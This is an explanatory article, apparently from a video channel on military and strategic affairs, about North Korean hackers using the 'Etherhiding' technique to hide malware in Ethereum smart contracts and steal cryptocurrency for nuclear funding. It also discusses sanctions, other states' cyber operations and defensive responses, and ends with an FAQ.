North Korea's Blockchain Attacks: How Pyongyang Weaponized Cryptocurrency for Nuclear Funding

Watch the Episode

Video originally published on November 8, 2025.

In October, Google's Threat Intelligence Unit revealed a disturbing evolution in state-sponsored cybercrime: North Korean hackers from the group UNC5342 have been deploying sophisticated viruses through smart contracts on the Ethereum blockchain to steal cryptocurrency. This marks the first time government-backed hackers have been observed using a technique called Etherhiding, which exploits the decentralized nature of blockchain technology to make attacks nearly impossible to trace or stop. The campaign, ongoing since February, represents more than just technological innovation—it's a lifeline for a regime strangled by international sanctions, with stolen cryptocurrency funding North Korea's nuclear weapons program while simultaneously projecting power in a domain where Pyongyang's conventional military weaknesses become irrelevant.

Key Takeaways

North Korean hackers have stolen over $2 billion in cryptocurrency in a single year, accounting for approximately 13 percent of Pyongyang's GDP, with cumulative thefts exceeding $6 billion since the program's inception.

The hacking group UNC5342 is using Etherhiding, a technique that stores malicious code in smart contracts on the Ethereum blockchain, making it distributed across thousands of computers worldwide and nearly impossible to shut down.

According to the Multilateral Sanctions Monitoring Team, these stolen funds directly finance North Korea's nuclear weapons research and development.

Kim Jong Un has declared cyber warfare a 'magic weapon' alongside nuclear weapons and missiles, with South Korean estimates indicating North Korea operates approximately 6,000 cyber warfare troops.

This represents a fundamental shift in modern conflict, where cyberwarfare has evolved from a supplementary tool to a primary weapon for nations seeking to avoid physical combat while still projecting power and generating revenue.

The decentralized nature of blockchain technology makes these attacks exceptionally difficult to trace because attackers can retrieve malicious files using read-only calls that leave no visible transaction history.

Understanding Etherhiding: The Technical Foundation of North Korea's Attacks

To comprehend the significance of North Korea's blockchain exploitation, understanding the underlying technology is essential. A blockchain functions as an immutable digital ledger that records transactions across multiple computers simultaneously, operating like a massive shared spreadsheet accessible to everyone but alterable by no one after records are made. Transactions are grouped into blocks and linked together in a chain, hence the name. The revolutionary aspect of blockchain technology lies in its complete decentralization—no single entity controls it. Instead, thousands of computers worldwide maintain copies of the ledger, and cryptocurrencies emerged as rewards for people who maintain the blockchain by using their computers to verify transactions and add new blocks through a process called mining.

The Ethereum blockchain, which serves as the platform for these North Korean attacks, includes a critical feature beyond basic transaction recording: smart contracts. These are programs that live on the blockchain and execute automatically when certain conditions are met. They function autonomously once deployed, similar to vending machines that dispense products when sufficient payment is inserted. North Korean hackers weaponized this technology by hiding viruses within smart contracts. When victims click on links or download files from compromised websites, their devices silently connect to the blockchain, retrieve encrypted code from the smart contract, and install malware. The hackers then gain access to the victim's data and cryptocurrency holdings.

From the attacker's perspective, this approach offers elegant advantages. The malicious code isn't stored on a server that law enforcement can locate and shut down—it exists on the blockchain itself, distributed across thousands of computers globally. While the immutable nature of blockchain data means hackers cannot directly change smart contracts after deployment, they can use proxies and other methods to update contracts and modify malicious code. Etherhiding first emerged in 2023 and has been in use since, but the October announcement marked the first observation of government-backed hackers employing this method.

The technique proves exceptionally difficult to track and stop for two primary reasons. First, most blockchain users operate under pseudonyms, limiting the ability to verify identities—even casual observers of cryptocurrency likely recognize Satoshi Nakamoto, Bitcoin's pseudonymous creator. Second, attackers can retrieve malicious files using read-only calls that leave no visible transaction history on the blockchain, functioning like an untraceable burner phone used to detonate a bomb without leaving evidence for investigators. The fact that North Korean hacking groups have adopted and refined this technique suggests they are improving their capabilities at a staggering rate, with Western targets clearly in their sights.

The Economic Imperative: Why North Korea Turned to Cryptocurrency Theft

According to a 138-page report published by the Multilateral Sanctions Monitoring Team, a group established to observe North Korea's compliance with United Nations sanctions, the answer to why Pyongyang pursues these attacks is straightforward: money. The report found that North Korea uses funds obtained from these hacks to finance research and development of nuclear arms. Matthew Stern, CEO and Lead Investigator at CNC Intelligence Inc, an organization providing bespoke cybersecurity solutions, confirmed these findings in exclusive comments, stating that North Korea's adoption of Etherhiding extends its crypto theft strategy. For years, DPRK-linked threat actors have relied on mixers like Blender.io and Sinbad.io to obscure transaction trails after major exchange hacks. Now they are escalating by using the blockchain itself as part of their attacks. Their goal remains unchanged—converting stolen assets into hard currency for weapons programs—but the infrastructure they use for exploits has become far more resilient to disruption.

The scale of these thefts is staggering. According to investigators at the research firm Elliptic, North Korean hackers have stolen more than $2 billion in cryptocurrency in a single year, accounting for approximately 13 percent of Pyongyang's GDP. Cumulatively, they have stolen more than $6 billion since the program started. The fact that these proceeds constitute such a large percentage of North Korea's GDP indicates two critical realities: the exceptional skill of the hackers, and the devastating impact of international sanctions on the North Korean economy.

Research published in the journal Nature estimated that more than 60 percent of North Korea's population lives in absolute poverty, a situation where household income makes meeting basic needs impossible. According to the Borgen Project, a nonprofit working to end poverty, most workers in North Korea earn between $2 and $3 per month. The Korean Institute of America reports that the Won lost more than half its value in a single year due to surging inflation. Kim Jong Un himself has acknowledged this economic reality, admitting that the government cannot provide even basic necessities such as foodstuffs, groceries, and consumer goods to its citizens.

These stark figures illustrate why North Korea has committed so heavily to hacking operations. They also suggest why stopping these activities may prove exceptionally difficult—for a regime facing economic collapse, cryptocurrency theft represents not merely an opportunity but an economic necessity. The sanctions designed to pressure North Korea into abandoning its nuclear program have instead created a desperate state willing to pursue increasingly sophisticated and aggressive cybercrime to survive.

Cyber Warfare as Power Projection: North Korea's Magic Weapon

Beyond immediate financial needs, North Korea pursues these attacks as a projection of Pyongyang's power. Apart from its nuclear arsenal, North Korea's conventional forces are unimpressive. Analysts believe that North Korea's weapons stockpiles are aging and ineffective, and their troops—while numerous—are reportedly so hungry that they sell their equipment to afford food. Because of crippling economic sanctions and the regime's choice to prioritize its nuclear program, Pyongyang has been unable to invest in its conventional military as desired.

In place of building conventional arms, North Korea chose cyberattacks, with Kim Jong Un declaring that cyber warfare is a "magic weapon" and an "all-purpose sword that guarantees the North Korean People's Armed Forces ruthless striking capability, along with nuclear weapons and missiles." The regime has invested substantially in this magic weapon. South Korean defense estimates indicate that North Korea operates approximately 6,000 cyber warfare troops. While this may seem modest compared to conventional troop numbers, hackers operate under fundamentally different conditions. They face no physical danger and can inflict substantial damage from great distances.

This strategic calculation has proven effective enough that former US Secretary of State Mike Pompeo claimed that North Korea poses a bigger threat than Russia when it comes to cyberattacks. This assessment underscores not only the significant threat North Korea poses but also the broader danger of cyberwarfare as a domain of conflict. For a nation with limited conventional military options, cyber capabilities offer asymmetric advantages that allow Pyongyang to punch far above its weight on the international stage. The cryptocurrency thefts simultaneously fund the nuclear program while demonstrating technical sophistication that commands respect and fear from more powerful adversaries.

The New Normal: Cyberwarfare as Primary Weapon

North Korea's blockchain attacks do not occur in isolation. These operations coincide with Russia ramping up hybrid warfare against Europe, combining cyberattacks with sophisticated disinformation campaigns such as those observed during recent elections in Moldova. Russian spy ships have been caught mapping undersea cables in the Irish Sea that could cripple internet and energy communications across Europe if severed during a crisis.

China operates its own version of this strategy, with the US government recently claiming that Beijing maintains a hacker-for-hire ecosystem generating tens of millions of dollars in revenue. Chinese hacking groups like Salt Typhoon and Volt Typhoon have infiltrated at least nine US telecommunications networks and gained control of hundreds of internet routers to use as launch pads for attacks on critical infrastructure. In Asia, Taiwan has borne the brunt of these attacks, with experts estimating it faced 2.4 million cyberattacks daily in 2024, double the previous year's rate.

The concerning aspect extends beyond mere scale. Former NSA head Tim Haugh warned that China is not targeting these systems for intelligence gathering or economic advantage, but to ensure leverage in a future conflict over Taiwan. If the situation escalates into armed conflict, Chinese strategists want Americans distracted by failing infrastructure at home—water treatment plants going offline, power grids failing, transportation networks collapsing. This represents the new normal in international conflict.

Cyberwarfare has evolved from a supplementary tool to a primary weapon for nations weary of engaging in physical combat. This fundamentally changes the calculus of deterrence. During the Cold War, the threat of mutually assured destruction kept nuclear powers in check. But cyberwarfare exists in a different realm where attribution is difficult, retaliation is complicated, and the rules of engagement remain unwritten. When North Korean hackers steal cryptocurrency, the classification remains ambiguous—is it an act of war, economic espionage, or simple theft? The answer depends on perspective, and that ambiguity makes cyberwarfare particularly attractive to rogue states.

The Limits of Response: Why Traditional Deterrence Fails

The international community possesses few effective tools to address North Korea's cryptocurrency theft operations. Additional sanctions would further crush the North Korean economy, paradoxically incentivizing the regime to pursue more aggressive hacking to compensate for the shortfall. Russia's current relationship with North Korea—receiving military support for its war effort—makes additional UN sanctions unlikely, as Moscow would probably veto such measures.

Military intervention remains out of the question for multiple reasons. It would appear as an overreaction to cyberattacks, and any country pursuing such action would struggle to secure international support despite the North Korean regime's unpopularity. Additionally, North Korea's nuclear stockpile functions as an ever-present deterrent. Any nation invading North Korea faces the near-certainty that Kim Jong Un would deploy nuclear weapons, making the costs of military action prohibitively high.

This strategic impasse leaves the international community in a difficult position. Traditional tools of statecraft—sanctions, diplomatic pressure, military deterrence—prove ineffective or counterproductive when applied to state-sponsored cybercrime. The decentralized nature of blockchain technology compounds these challenges, as the infrastructure hosting malicious code cannot be seized or shut down through conventional law enforcement methods. North Korea has effectively identified a domain where its weaknesses become irrelevant and its technical capabilities allow it to operate with relative impunity.

Building Defenses: International Cooperation and National Strategies

According to Matthew Stern, addressing these threats requires substantially more international cooperation. Financial intelligence units and agencies like the Financial Crimes Enforcement Network (FinCEN) and INTERPOL have improved tracing, freezing, and sanctions designations. However, what remains missing is a unified, rapid framework for identifying and suppressing on-chain malicious artifacts—such as wallet indicators of compromise and malicious contract addresses—across jurisdictions. While coordination by international law enforcement agencies has been critical, addressing threats like Etherhiding would benefit from a global database of malicious wallets. North Korea exploits time gaps in current systems, laundering stolen cryptocurrency through mixers, bridges, and over-the-counter brokers faster than existing cooperation models can respond.

While this proposal sounds promising in theory, it confronts the messy reality of international politics. Building a global database would require countries to willingly share intelligence about their vulnerabilities, which most nations understandably resist. The fear persists that today's friend could become tomorrow's enemy, and shared information might be weaponized against the sharing nation. Trust deficits between major powers make comprehensive information sharing exceptionally difficult to achieve.

Despite these challenges, international cooperation is advancing. NATO declared in 2016 that hybrid attacks against a member could lead to invoking Article 5, the collective defense provision. More recently, in 2022, NATO Leaders endorsed comprehensive preventive and response options to counter hybrid threats that can be tailored to address specific situations. The United Nations recently adopted the Convention on Cybercrime which, despite opposition from critics who decry its vague language, could facilitate international cooperation in enforcing cybercrime laws. At the time of the announcement, the treaty was not yet in effect, but a signing ceremony was scheduled for October 25-26 in Vietnam. After this ceremony, individual UN members would decide internally whether to ratify the treaty. It requires ratification by at least 40 nations before entering into force.

Beyond international cooperation, governments are developing their own defensive plans. In the United States, the Cybersecurity and Infrastructure Security Agency (CISA) developed a strategic plan to address attacks and reduce vulnerabilities in key infrastructure. The National Guard introduced a pilot program to strengthen local defenses against cyberattacks. In Europe, Ukraine recently strengthened its cybersecurity framework to guard against Russian aggression, learning hard lessons from years of sustained cyber operations against its infrastructure.

While all these measures are necessary, they cannot eliminate the threat entirely. As long as vulnerabilities remain, malicious actors will find ways to exploit them—this is simply the nature of security challenges. What these measures accomplish is making attacks more difficult, more costly, and more likely to fail. When attacks do succeed, the measures ensure that damage is contained and recovery is swift. In the evolving landscape of cyberwarfare, where complete prevention remains impossible, resilience and rapid response become the realistic goals of defensive strategy.

Related Coverage

FAQ

What is Etherhiding and how does it work?

Etherhiding is a technique where hackers hide malicious code in smart contracts on the Ethereum blockchain. When victims click on links or download files from compromised websites, their devices silently connect to the blockchain, retrieve encrypted code from the smart contract, and install malware. The malicious code isn't stored on a server that can be shut down—it exists on the blockchain itself, distributed across thousands of computers globally. Attackers can retrieve malicious files using read-only calls that leave no visible transaction history on the blockchain.

How much cryptocurrency has North Korea stolen and what do they use it for?

According to investigators at the research firm Elliptic, North Korean hackers have stolen more than $2 billion in cryptocurrency in a single year, accounting for approximately 13 percent of Pyongyang's GDP. Cumulatively, they have stolen more than $6 billion since the program started. According to the Multilateral Sanctions Monitoring Team, North Korea uses these stolen funds to finance research and development of nuclear arms.

Why is North Korea so heavily invested in cryptocurrency theft?

North Korea pursues cryptocurrency theft for two primary reasons: economic necessity and power projection. International sanctions have devastated the North Korean economy, with more than 60 percent of the population living in absolute poverty and most workers earning $2 to $3 per month. The stolen cryptocurrency provides crucial funding for the regime. Additionally, Kim Jong Un has declared cyber warfare a 'magic weapon' alongside nuclear weapons and missiles, allowing North Korea to project power despite its weak conventional military forces.

Is this the first time government-backed hackers have used Etherhiding?

Yes. While Etherhiding first emerged in 2023 and has been in use since, the October announcement by Google's Threat Intelligence Unit marked the first observation of government-backed hackers employing this method. This suggests that North Korean hacking groups are improving their capabilities at a staggering rate.

Why can't traditional methods like sanctions or military intervention stop these attacks?

Traditional deterrence methods prove ineffective for several reasons. Additional sanctions would further crush the North Korean economy, paradoxically incentivizing the regime to pursue more aggressive hacking to compensate for the shortfall. Russia's current relationship with North Korea makes additional UN sanctions unlikely, as Moscow would probably veto such measures. Military intervention remains out of the question because it would appear as an overreaction and any nation invading North Korea faces the near-certainty that Kim Jong Un would deploy nuclear weapons.

How many cyber warfare troops does North Korea operate?

South Korean defense estimates indicate that North Korea operates approximately 6,000 cyber warfare troops. While this may seem modest compared to conventional troop numbers, hackers operate under fundamentally different conditions—they face no physical danger and can inflict substantial damage from great distances.

What defensive measures are being implemented against these attacks?

Defensive measures include both international cooperation and national strategies. NATO declared in 2016 that hybrid attacks against a member could lead to invoking Article 5, and in 2022 endorsed comprehensive preventive and response options. The UN recently adopted the Convention on Cybercrime to facilitate international cooperation. In the United States, CISA developed a strategic plan to address attacks and reduce vulnerabilities, while the National Guard introduced a pilot program to strengthen local defenses. In Europe, Ukraine recently strengthened its cybersecurity framework to guard against Russian aggression.

What is a blockchain and how does it relate to these attacks?

A blockchain is an immutable digital ledger that records transactions across multiple computers simultaneously, operating like a massive shared spreadsheet accessible to everyone but alterable by no one after records are made. The Ethereum blockchain includes smart contracts—programs that live on the blockchain and execute automatically when certain conditions are met. North Korean hackers weaponized this technology by hiding viruses within smart contracts, taking advantage of the blockchain's decentralized nature to make their attacks nearly impossible to shut down.

Sources

About the Author

Wilfred M. Waimiri

Wilfred M. Waimiri creates and presents analysis focused on military doctrine, strategic competition, and conflict dynamics.

About the Team →